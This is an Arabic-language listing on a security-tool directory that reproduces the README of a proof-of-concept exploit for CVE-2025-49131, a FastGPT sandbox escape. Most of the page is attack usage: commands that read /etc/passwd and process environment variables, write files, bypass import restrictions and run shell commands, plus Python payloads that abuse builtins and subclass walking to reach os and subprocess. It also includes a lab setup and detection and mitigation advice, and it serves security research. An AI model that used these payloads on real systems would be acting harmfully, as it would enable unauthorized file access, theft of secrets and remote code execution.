Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-49131-poc — استغلال إثبات المفهوم لـ CVE-2025-49131، وهو هروب من صندوق الرمل في FastGPT يتيح قراءة/كتابة ملفات عشوائية وتجاوز الاستيراد وتنفيذ التعليمات البرمجية عن بُعد عبر واجهة برمجة تطبيقات الصندوق الرملي. | Kitploit
أدوات/GitHubGitHub/wenura17125/cve-2025-49131-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعدالهروب من الحاوية
GitHubwenura17125/cve-2025-49131-poc

cve-2025-49131-poc

استغلال إثبات المفهوم لـ CVE-2025-49131، وهو هروب من صندوق الرمل في FastGPT يتيح قراءة/كتابة ملفات عشوائية وتجاوز الاستيراد وتنفيذ التعليمات البرمجية عن بُعد عبر واجهة برمجة تطبيقات الصندوق الرملي.

عرض المستودع
7منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-49131 - إثبات مفهوم الهروب من صندوق الرمل في FastGPT

root@kitploit:~
 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
                                                            
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
                                                            
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
        ╔═══════════════════════════════════════╗
        ║     CVE-2025-49131 | CVSS 6.3        ║
        ║   FastGPT Sandbox Container Escape   ║
        ║      Affected: < v4.9.11             ║
        ╚═══════════════════════════════════════╝

🎯 نظرة عامة على الثغرة

الحقلالقيمة
معرف CVECVE-2025-49131
درجة CVSS6.3 (متوسطة)
متجه CVSSAV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
نوع الثغرةهروب من صندوق الرمل
البرنامج المتأثرFastGPT (حاوية fastgpt-sandbox)
الإصدارات المتأثرة< 4.9.11
الإصدار المُصحَّح4.9.11+
تاريخ الإفصاح9 يونيو 2025

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لأغراض البحث الأمني المصرح به والتعليم فقط.

  • لا تختبر إلا الأنظمة التي تملكها أو حصلت على إذن كتابي صريح لاختبارها
  • اتبع ممارسات الإفصاح المسؤول
  • امتثل لجميع القوانين واللوائح المعمول بها

📖 الوصف

CVE-2025-49131 هي ثغرة هروب من صندوق الرمل في حاوية fastgpt-sandbox الخاصة بـ FastGPT. توجد الثغرة بسبب:

  • آليات عزل غير كافية - لا يقيّد صندوق الرمل الدوال المدمجة في Python بشكل صحيح
  • استدعاءات نظام متساهلة بشكل مفرط - لا يتم حظر استدعاءات النظام الخطيرة
  • قيود غير كافية على تنفيذ الكود - يمكن تجاوز قيود الاستيراد

التأثير

يسمح الاستغلال الناجح للمهاجم بـ:

  • ✅ قراءة ملفات عشوائية - الوصول إلى /etc/passwd وملفات الإعدادات والأسرار
  • ✅ كتابة ملفات عشوائية - تعديل ملفات النظام وحقن كود خبيث
  • ✅ تجاوز قيود استيراد Python - استيراد وحدات os و subprocess
  • ✅ احتمال تنفيذ تعليمات برمجية عن بُعد (RCE) - تنفيذ أوامر النظام عبر الوحدات المستوردة

🚀 بدء سريع

root@kitploit:~
# Clone this repository
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc

# Install dependencies
pip install -r requirements.txt

# Run vulnerability detection
python poc.py --target http://localhost:3001 --detect

# Read a file
python poc.py --target http://localhost:3001 --read /etc/passwd

# Attempt RCE
python poc.py --target http://localhost:3001 --rce "id"

🔧 إعداد بيئة قابلة للاستغلال

root@kitploit:~
# Start vulnerable and patched containers
docker-compose up -d

# Vulnerable sandbox on port 3001
# Patched sandbox on port 3002

💻 الاستخدام

وضع الكشف (غير مدمر)

root@kitploit:~
python poc.py --target http://localhost:3001 --detect -v

قراءة ملفات عشوائية

root@kitploit:~
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ

كتابة الملفات

root@kitploit:~
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"

تجاوز الاستيراد

root@kitploit:~
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess

متغيرات البيئة

root@kitploit:~
python poc.py --target http://localhost:3001 --env

تنفيذ التعليمات البرمجية عن بُعد

root@kitploit:~
python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"

جميع الخيارات

root@kitploit:~
python poc.py --help

📁 هيكل المشروع

root@kitploit:~
cve-2025-49131-poc/
├── poc.py                # Main exploit script
├── payloads.py           # Payload generator library
├── docker-compose.yml    # Test environment
├── requirements.txt      # Python dependencies
├── README.md             # This file
└── tests/
    └── test_exploit.py   # Automated tests

🔬 التفاصيل التقنية

السبب الجذري للثغرة

تم تصميم صندوق الرمل في FastGPT لتنفيذ الكود المقدَّم من المستخدم في بيئة معزولة. ومع ذلك، فإن آليات العزل غير كافية:

  1. الوصول إلى __builtins__ في Python - لا يقيّد صندوق الرمل الوصول إلى الدوال المدمجة مثل open() و __import__() وغيرها بشكل صحيح

  2. تصفية استدعاءات النظام - تتضمن قائمة استدعاءات النظام المسموح بها استدعاءات خطيرة تتيح الوصول إلى نظام الملفات

  3. تجاوز قيود الاستيراد - توجد تقنيات متعددة لتجاوز قيود استيراد الوحدات

سير عملية الاستغلال

root@kitploit:~
┌─────────────────────────────────────────────┐
│ 1. Send malicious code to sandbox API       │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 2. Bypass sandbox restrictions using:       │
│    - __builtins__ manipulation              │
│    - Subclass walking                       │
│    - Import bypass techniques               │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 3. Gain access to:                          │
│    - File system (read/write)               │
│    - os/subprocess modules                  │
│    - Environment variables                  │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 4. Impact:                                  │
│    - Data exfiltration                      │
│    - Code injection                         │
│    - Remote command execution               │
└─────────────────────────────────────────────┘

أمثلة على الحمولات

قراءة ملف:

root@kitploit:~
open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()

تجاوز الاستيراد:

root@kitploit:~
__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__() 
 if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__'](https://github.com/wenura17125/cve-2025-49131-poc/blob/main/%27os%27)

تنفيذ تعليمات برمجية عن بُعد (RCE):

root@kitploit:~
__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)

🛡️ الكشف والتخفيف

الكشف

ابحث عن نشاط مشبوه في سجلات صندوق الرمل:

  • محاولات الوصول إلى /etc/passwd و /etc/shadow
  • استدعاءات __builtins__ و __import__
  • استخدام وحدات Subprocess أو os
  • عمليات قراءة/كتابة ملفات غير معتادة

التخفيف

  1. قم بترقية FastGPT إلى الإصدار 4.9.11 أو أحدث
  2. عزل الشبكة - قيّد وصول شبكة حاوية صندوق الرمل
  3. حدود الموارد - طبّق حدود المعالج/الذاكرة على الحاويات
  4. المراقبة - نفّذ تسجيلًا وتنبيهات لأنشطة صندوق الرمل

📚 المراجع

  • NVD - CVE-2025-49131
  • مستودع FastGPT على GitHub
  • النشرة الأمنية على GitHub
  • وثائق FastGPT

⏱️ الجدول الزمني

التاريخالحدث
2025-??-??اكتشاف الثغرة
2025-??-??إخطار المورّد
2025-06-??إصدار التصحيح (v4.9.11)
2025-06-09الإفصاح العام

📄 الترخيص

هذا المشروع مخصص لأغراض تعليمية وبحوث أمنية مصرح بها فقط. استخدمه بمسؤولية.


أُنشئ لأغراض البحث الأمني. احصل دائمًا على التصريح المناسب قبل الاختبار.

تنزيل الأداة